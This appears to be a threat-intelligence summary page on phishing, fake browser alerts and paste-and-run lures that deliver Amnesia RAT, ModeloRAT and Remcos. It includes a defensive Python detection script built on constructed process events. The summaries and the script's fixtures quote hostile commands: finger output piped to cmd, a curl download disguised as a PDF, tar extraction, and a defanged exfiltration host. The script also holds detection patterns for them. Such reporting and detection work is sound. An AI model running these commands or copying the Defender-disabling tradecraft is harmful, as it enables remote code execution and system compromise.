Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe social-engineering-driven malware delivery leading to remote access and follow-on payload deployment. Fortinet observed a multi-stage phishing campaign targeting users in Russia that delivers Amnesia RAT and ransomware via business-themed decoy documents and a malicious .lnk shortcut using a double extension (e.g., *.txt.lnk). The infection chain uses public cloud services for staging—GitHub for scripts and Dropbox for binary payloads—and abuses defendnot to trick Windows into believing a third-party AV is installed, effectively disabling Microsoft Defender before later-stage execution.
Separately, Huntress attributed activity to KongTuke, which uses malicious browser extensions to display fake “browser crash” security alerts (“CrashFix”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed ModeloRAT. ModeloRAT is described as heavily obfuscated, using Windows Registry persistence and RC4-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights Scarlet Goldfinch activity using paste-and-run lures and a notable technique of using the Windows finger client to pull remote content (e.g., finger user@IP | cmd), followed by curl download of an archive masquerading as a PDF and extraction via tar -xf, culminating in Remcos (and sometimes NetSupport) delivered via DLL sideloading.
Timeline
Jan 25, 2026
Rescana links Russia campaign TTPs to DupeHike and Paper Werewolf
A follow-up analysis assessed the phishing activity as sophisticated and noted overlaps in tactics, techniques, and procedures with UNG0902's Operation DupeHike and Paper Werewolf/GOFFEE. The report suggested a well-resourced actor pursuing a mix of espionage and financial objectives.
Jan 24, 2026
Microsoft issues mitigation guidance for defendnot-style abuse
In response to the observed tradecraft, Microsoft recommended enabling Tamper Protection and monitoring for suspicious use of Windows Security Center APIs. The guidance was aimed at detecting and mitigating attempts to disable Defender through fake antivirus registration.
Jan 24, 2026
Campaign deploys Amnesia RAT, ransomware, and WinLocker
Researchers reported that the same intrusion chain delivered Amnesia RAT for credential theft, surveillance, and remote control, followed by a Hakuna Matata-family ransomware variant that encrypted files and monitored the clipboard for cryptocurrency wallet swapping. The attack concluded with WinLocker to restrict user interaction on compromised systems.
Jan 24, 2026
Researchers detail defendnot abuse to disable Microsoft Defender
Analysis of the Russia-focused phishing campaign revealed the attackers used the public tool defendnot to register a fake antivirus with Windows Security Center, causing Microsoft Defender to turn off. The campaign also added Defender exclusions and tampered with policy and registry settings to reduce visibility and recovery options.
Jan 24, 2026
Fortinet reports phishing campaign hitting Russian organizations
Fortinet FortiGuard Labs reported a multi-stage phishing campaign targeting users in Russia with business-themed decoys and malicious LNK files in archives. The campaign delivered Amnesia RAT and a Hakuna Matata-derived ransomware without exploiting software vulnerabilities, instead abusing native Windows features and public services like GitHub, Dropbox, and Telegram.
Dec 1, 2025
Remcos intrusion chain uses Finger, curl, tar, and DLL sideloading
During the December 2025 activity, Red Canary observed an intrusion chain beginning with paste-and-run lures and use of the Windows Finger utility to retrieve remote commands or payloads. Follow-on stages used curl to download a PDF-disguised archive, tar to extract it, and DLL sideloading through a legitimate vulnerable executable to launch a malicious Remcos DLL.
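The finger-to-cmd, curl-as-PDF and tar -xf stages described in the summary above and in this timeline entry can be turned into a small process-lineage detection. This is an added illustration, not Red Canary's detection logic or code from any of the reports: the events below are constructed Sysmon-style process-creation records, the IP 203.0.113.10 is a documentation address, and the rule names and the two-stage escalation threshold are assumptions of the example.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style) for a dry run; not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd.exe /c "finger user@203.0.113.10 | cmd"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\finger.exe",
     "cmd": "finger user@203.0.113.10"},
    {"pid": 202, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd"},
    {"pid": 203, "ppid": 202, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl -s http://203.0.113.10/report.pdf -o %TEMP%\report.pdf"},
    {"pid": 204, "ppid": 202, "image": r"C:\Windows\System32\tar.exe",
     "cmd": r"tar -xf %TEMP%\report.pdf"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl -s https://example.com/index.html -o page.html"},
]

# One rule per stage the reporting describes. The pipe into cmd is what distinguishes
# the finger stage, so a plain finger query (pid 201) does not fire on its own.
RULES = [
    ("finger_pipe_cmd", re.compile(r"\bfinger(\.exe)?\s+\S+@\S+\s*\|\s*cmd\b", re.I)),
    ("curl_fake_pdf", re.compile(r"\bcurl(\.exe)?\b.*\s(-o|--output)\s+\S+\.pdf\b", re.I)),
    ("tar_extract_pdf", re.compile(r"\btar(\.exe)?\s+-\S*x\S*\s+\S+\.pdf\b", re.I)),
]

def tree_root(pid, by_pid):
    """Return the pid at the top of this process tree: the first ancestor whose own
    parent is explorer.exe or is absent from the event set (a user-launched shell)."""
    while True:
        ev = by_pid.get(pid)
        parent = by_pid.get(ev["ppid"]) if ev else None
        if parent is None or parent["image"].lower().endswith("explorer.exe"):
            return pid
        pid = ev["ppid"]

def analyze(events):
    """Match rules per event, then group hits by process tree so that several stages
    observed under one tree escalate to a high-confidence chain alert."""
    by_pid = {e["pid"]: e for e in events}
    hits, chains = [], {}
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmd"]):
                hits.append((ev["pid"], name))
                chains.setdefault(tree_root(ev["pid"], by_pid), []).append(name)
    high = {root for root, names in chains.items() if len(set(names)) >= 2}
    return {"hits": hits, "chains": chains, "high_confidence": high}

if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

The benign curl under pid 300 shows why the rules key on the `.pdf` output name and the pipe into cmd rather than on the presence of curl, tar or finger alone.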
Dec 1, 2025
Red Canary observes Remcos rise in Scarlet Goldfinch activity
In December 2025, Red Canary observed Remcos enter its top 10 payloads associated with the Scarlet Goldfinch activity cluster. The malware was seen delivered both alongside NetSupport Manager and on its own, suggesting a possible shift in tooling.
Related Stories

Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi-Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva-25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
Malware Delivery via Deceptive Lures: Malvertising, Fake Recruitment Repos, and Phishing Dropping RATs
Multiple reports detail **social-engineering-driven malware delivery** that results in **remote access trojans (RATs)** and credential theft. Infoblox described observing an affiliate push-notification ad network after exploiting misconfigured DNS delegations (“**Sitting Ducks**”/lame name server delegation) to take over abandoned threat-actor domains, allowing collection of **~57M logs** over two weeks and visibility into widespread **scams and brand impersonation** delivered via push ads. Nextron Systems separately reported recurring **malvertising** chains where “free converter” tools (e.g., document/image converters) downloaded from ads on legitimate sites function as advertised while covertly installing **persistent RATs**, with common artifacts such as Windows **Mark-of-the-Web** (`ZoneId=3`) indicating internet origin. Other activity in the set reflects different initial-access lures but the same general outcome—RAT-style access and data theft. Fortinet analyzed a **phishing** campaign using a fake Vietnam shipping document: a Word attachment leads to an RTF stage that exploits an RTF-related vulnerability, then uses **VBScript/PowerShell** to load a **fileless .NET module**, ultimately downloading and injecting a **Remcos** variant (including process hollowing) to provide full remote control. Separately, reporting on North Korea’s **“Contagious Interview”** campaign described fake recruiter outreach (e.g., via LinkedIn) that tricks developers into opening malicious code repositories; execution can be triggered via a hidden **VS Code `tasks` configuration**, server-side logic hooks, or a malicious npm dependency to steal credentials/crypto wallets and establish persistence—this is thematically similar (social engineering leading to remote access) but is a distinct operation from the malvertising/push-ad and Remcos phishing activity.